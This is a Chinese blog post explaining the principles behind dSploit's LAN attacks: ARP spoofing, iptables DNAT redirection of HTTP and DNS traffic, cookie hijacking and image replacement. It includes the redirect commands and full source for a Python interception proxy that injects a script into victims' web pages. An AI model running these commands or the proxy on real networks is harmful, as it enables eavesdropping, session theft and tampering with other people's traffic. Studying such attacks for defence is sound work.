之前研究Dsploit的部分功能实现原理,现在了解的差不多了,简要记录下Dsploit的断网攻击,html注入,图片替换,cookie劫持的原理。本篇blog需要有一定的网络知识基础在看。

假设现有三台主机,A代表网关,B代表攻击者,C代表受害者。A,B,C的ip分别为192.168.1.1       192.168.1.2       192.168.1.3

B使用Nmap扫描当前网段下的主机,发现了网关A,联网主机C。

断网原理:B如果想让C断网,只需要用arpspoof不断发arp reply包将自己伪装为网关A,即发送的arp reply包中ip为网关的ip192.168.1.1,但是arp reply中的mac却是自己的,这样C主机会将数据发送给攻击者B,如果攻击者B没有设置ip转发,那么主机C就会断网。

html注入,图片替换,cookie劫持原理:

在上述的断网原理下,如果攻击者B开启了ip转发功能,用iptables工具输入 iptables -t nat -s 192.168.1.3 -p tcp --dport 80 -j DNAT --to 192.168.1.2:8080

将主机C发送的目的端口是80的tcp报文转发到本机监听的端口8080上(注:这里8080只是举例用,不一定非要8080,只要是http代理监听的端口就行)

然后主机B在本机上运行http代理程序,http代理根据主机C发的http头可知主机C要连接的网站是哪个网站,根据网址将http请求转发,再将网站的响应转发给主机C,这样主机C还不知道自己的数据已经被窃听到了。

html注入发生在攻击者B将网站的响应转发给主机C的过程中,若http代理发现该响应可以注入html代码,就将html代码注入到响应后,再将注入后的响应发送给主机C,cookie劫持,图片替换发生在攻击者B转发主机C的http请求时,http代理将主机C发送的http请求中的cookie记录下来,就可利用主机C的cookie来进行登录服务。若http代理发现http头请求的文件类型为图片,则直接转发自己定义的图片给主机C。

DNS劫持原理与html注入类似,iptables -t nat -p udp --dport 53 -j DNAT --to 192.168.1.2:3000将DNS请求转发给本机的DNS代理,根据DNS报文的内容决定要不要伪造DNS响应。

下面给一个简单的http代理程序源码,本http代理会在响应中注入<script>alert("you have been hacked.")</script>

#!/
# coding = utf-8
import socket
import threading
import re class HttpHeaderParser(object):
def __init__(self, arg):
super(HttpHeaderParser, self).__init__()
self.arg = arg
self._parse();
def _parse(self):
try:
#print 'raw data:\n' + self.arg;
data = self.arg[self.arg.find('\r'):self.arg.find('\n\r\n')]
self.name = re.findall('\n(.*?):',data);
self.value = re.findall(':(.*?)\r',data);
self.body = self.arg[self.arg.find('\r\n\r\n') + 4:];
self.status = self.arg[0:self.arg.find('\r\n')];
for i in range(0,len(self.value)):
self.value[i] = self.value[i].lstrip();#过滤不必要的空格
self._getHostAddr();
except:
print 'error';
#print self.arg;
def getAttribute(self,name):
if name in self.name:
return self.value[self.name.index(name)];
return None;
def setAttribute(self,name,value):
if name in self.name:
self.value[self.name.index(name)] = value;
return ;
self.name.append(name);
self.value.append(value); def _getHostAddr(self):
self.host = self.getAttribute('Host');
self.port = 80;
if ':' in self.host:
tmp = self.host;
self.host = tmp[0:tmp.find(':')];
self.host = socket.gethostbyname(self.host);
self.port = int(tmp[tmp.find(':') + 1:])
def getAddr(self):
return (self.host,self.port); def buildHeader(self):
tmp = self.status + '\r\n';
for i in range(0,len(self.name)):
tmp = tmp + self.name[i] + ':' + self.value[i] + '\r\n';
tmp = tmp + '\r\n' + self.body;
#print 'build:\n' + tmp;
return tmp; def proc(client):
data = client.recv(2048);
#print data;
if data:
parser = HttpHeaderParser(data);
addr = parser.getAddr();
if addr[0] == '192.168.155.1':
addr = (socket.gethostbyname('123.207.127.183'),80);
parser.setAttribute('Host','123.207.127.183')
parser.setAttribute('Accept-Encoding','');
head = parser.buildHeader();
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM);
sock.connect(addr);
sock.sendall(head);
html = sock.recv(2048);
while html:
html = html.replace('<body>','<body><script>alert(\"you have been hacked.\")</script>');
print html;
client.sendall(html);
html = sock.recv(1024);
sock.close(); client.close(); def main():
addr = ('0.0.0.0',3000);
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM);
sock.bind(addr);
sock.listen(80);
b = True;
while b:
client,clientaddr = sock.accept();
t = threading.Thread(target = proc,args =(client,));
t.start();
#t.join();
sock.close();
print 'finish!!!'; if __name__ == '__main__':
main()

在本机设置为http代理运行之后,打开网页

会先出现

然后才是网站的真正响应。

ps:如有错误,欢迎指正。

局域网下的html注入及DNS劫持的更多相关文章

  1. 关于全站https必要性http流量劫持、dns劫持等相关技术

    关于全站https必要性http流量劫持.dns劫持等相关技术 微信已经要求微信支付,申请退款功能必须12月7号之前必须使用https证书了(其他目前为建议使用https),IOS也是2017年1月1 ...

  2. 一文搞懂│XSS攻击、SQL注入、CSRF攻击、DDOS攻击、DNS劫持

    目录 XSS 攻击 SQL 注入 CSRF 攻击 DDOS 攻击 DNS 劫持 XSS 攻击 全称跨站脚本攻击 Cross Site Scripting 为了与重叠样式表 CSS 进行区分,所以换了另 ...

  3. Kali 局域网 DNS 劫持

    <一> 所需工具  1: Kali-linux-2017  2: ettercap 0.8.2 3: web 服务器, 这里以 node 为例 <二> 原理  1: DNS劫持 ...

  4. kali下DNS劫持(9.28 第十四天)

    DNS劫持 环境: windows2008R2    被攻击者 kali        攻击者 1.在攻击者电脑中搭建web服务 2.在/var/www/html 写入html文件 index.htm ...

  5. openwrt-智能路由器hack技术(1)---"DNS劫持"

    openwrt-智能路由器hack技术(1)---"DNS劫持" 1   导读 PS:之前写的一个文章,现在发现结构内容排版不是太好,导致阅读体验太差,影响传播和SEO,所以现在整 ...

  6. 无线安全: 通过伪AP进行DHCP+DNS劫持的钓鱼攻击

    有了之前学习802.11的数据帧格式.芯片硬件参数学习的基础后,我们接下来继续学习无线安全中黑客是怎样进行流量劫持攻击的 相关学习资料 http://www.freebuf.com/articles/ ...

  7. 轻松了解DNS劫持

    对于互联网,人们总是高谈阔论,却很少有人愿意去了解电脑.手机.电视这些设备到底是如何被"连接"起来的.本文通过"我",一个普通的网络请求的视角,给大家介绍下&q ...

  8. DNS劫持解决方法

    刚在家上网,发自己的浏览器竟然还会弹出页面广告(我浏览器装了屏蔽广告的浏览器应用,理论上就不会出现什么弹出来的广告). 于是自己仔细研究了下,发现在易迅的页面竟然嵌套了一个iframe,首先易迅肯定不 ...

  9. 【HTTP劫持和DNS劫持】腾讯的实际业务分析

        简单介绍一下HTTP劫持和DNS劫持的概念,也就是运营商通过某些方式篡改了用户正常访问的网页,插入广告或者其他一些杂七杂八的东西.       首先对运营商的劫持行为做一些分析,他们的目的无非 ...

随机推荐

  1. Javaweb项目开发的前后端解耦的必要性

    JavaWeb项目为何我们要放弃jsp?为何要前后端解耦?为何要动静分离? 使用jsp的痛点: 1.jsp上动态资源和静态资源全部耦合在一起,服务器压力大,因为服务器会收到各种静态资源的http请求, ...

  2. linq 在查询表达式中处理异常

    在查询表达式的上下文中可以调用任何方法. 但是,我们建议避免在查询表达式中调用任何会产生副作用(如修改数据源内容或引发异常)的方法. 此示例演示在查询表达式中调用方法时如何避免引发异常,而不违反有关异 ...

  3. 状态码为 200 from cache和304 Not modified的区别

    1.请求状态码为 200  from cache: 表示该资源已经被缓存过,并且在有效期内,所以不再向浏览器发出请求,直接使用本地缓存. 如下图: 2.状态码为 304 Not modified: 表 ...

  4. font-size:100% 原因

    The browser default which is something like 16pt for Firefox, You can check by going into Firefox op ...

  5. 密码学那些事———SHA-512及其C++实现

    SHA-512及其C++实现 转载请注明出处 一.引言 相信大家对于哈希压缩加密算法应该不陌生,在我们用微信或者支付宝接口的时候经常会遇到用这类算法加密,以验证数据的完整性.可以说这类算法无处不在,那 ...

  6. 使用jquery ajaxForm提交表单

    一.首先引用Jquery <script src="~/Scripts/jquery-1.9.1.min.js"></script> <script ...

  7. Linux服务器上安装vsftpd

    1.首先判断你服务器上是否安装了vsftpd rpm -q vsftpd   2.安装vsftpd yum -y install vsftpd   3.重启vsftpd service vsftpd ...

  8. IE6中 PNG 背景透明的最佳解决方案

    为什么要使用 PNG 图片? 简 单来说,使用 PNG 格式比起 GIF 来表现色彩更丰富,特别是表现渐变以及背景透明的渐变要比GIF格式出色很多.目前,最新的浏览器基本上都支持PNG格式.唯独有万恶 ...

  9. JavaScript 数组基本操作

    简介 数组操作无论是在JavaScript中还是在其他语言中都是很常见.经常会用到的,现在我把JavaScript 数组基本操作整理一下,供大家参考学习.里边包含我自己的见解以及案例,希望能够帮助大家 ...

  10. js规范

    js规范 Array 和 Object 直接量 为了避免这些歧义, 我们应该使用更易读的直接量来声明. var a = [x1, x2, x3]; var a2 = [x1, x2]; var a3 ...